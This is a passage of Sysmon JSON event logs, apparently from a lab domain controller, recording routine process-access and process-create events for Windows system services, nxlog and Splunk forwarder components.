{"EventTime":"2020-08-01 06:50:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2890,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:27.139\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:27.139","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2891,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:27.139\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:27.139","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2892,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:27.139\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-10B3-5F25-0000-00100EF20400}\r\nTargetProcessId: 4732\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:27.139","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-10B3-5F25-0000-00100EF20400}","TargetProcessId":"4732","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2893,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:27.249\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:27.249","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:50:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2894,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:27.265\r\nSourceProcessGUID: {E2A3D6B1-10B3-5F25-0000-00100EF20400}\r\nSourceProcessId: 4732\r\nSourceThreadId: 4724\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nTargetProcessId: 2792\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:27.265","SourceProcessGUID":"{E2A3D6B1-10B3-5F25-0000-00100EF20400}","SourceProcessId":"4732","SourceThreadId":"4724","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","TargetProcessId":"2792","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2895,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:27.689\r\nProcessGuid: {E2A3D6B1-10B3-5F25-0000-0010D9F30400}\r\nProcessId: 4744\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Registry monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-regmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25\r\nParentProcessGuid: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nParentProcessId: 2792\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:50:27.689","ProcessGuid":"{E2A3D6B1-10B3-5F25-0000-0010D9F30400}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","FileVersion":"8.0.2","Description":"Registry monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-regmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25","ParentProcessGuid":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","ParentProcessId":"2792","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:50:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2896,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:27.688\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nSourceProcessId: 2792\r\nSourceThreadId: 4028\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-10B3-5F25-0000-0010D9F30400}\r\nTargetProcessId: 4744\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:27.688","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","SourceProcessId":"2792","SourceThreadId":"4028","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-10B3-5F25-0000-0010D9F30400}","TargetProcessId":"4744","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2897,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:27.688\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-10B3-5F25-0000-0010D9F30400}\r\nTargetProcessId: 4744\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:27.688","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-10B3-5F25-0000-0010D9F30400}","TargetProcessId":"4744","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:50:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2898,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:27.688\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 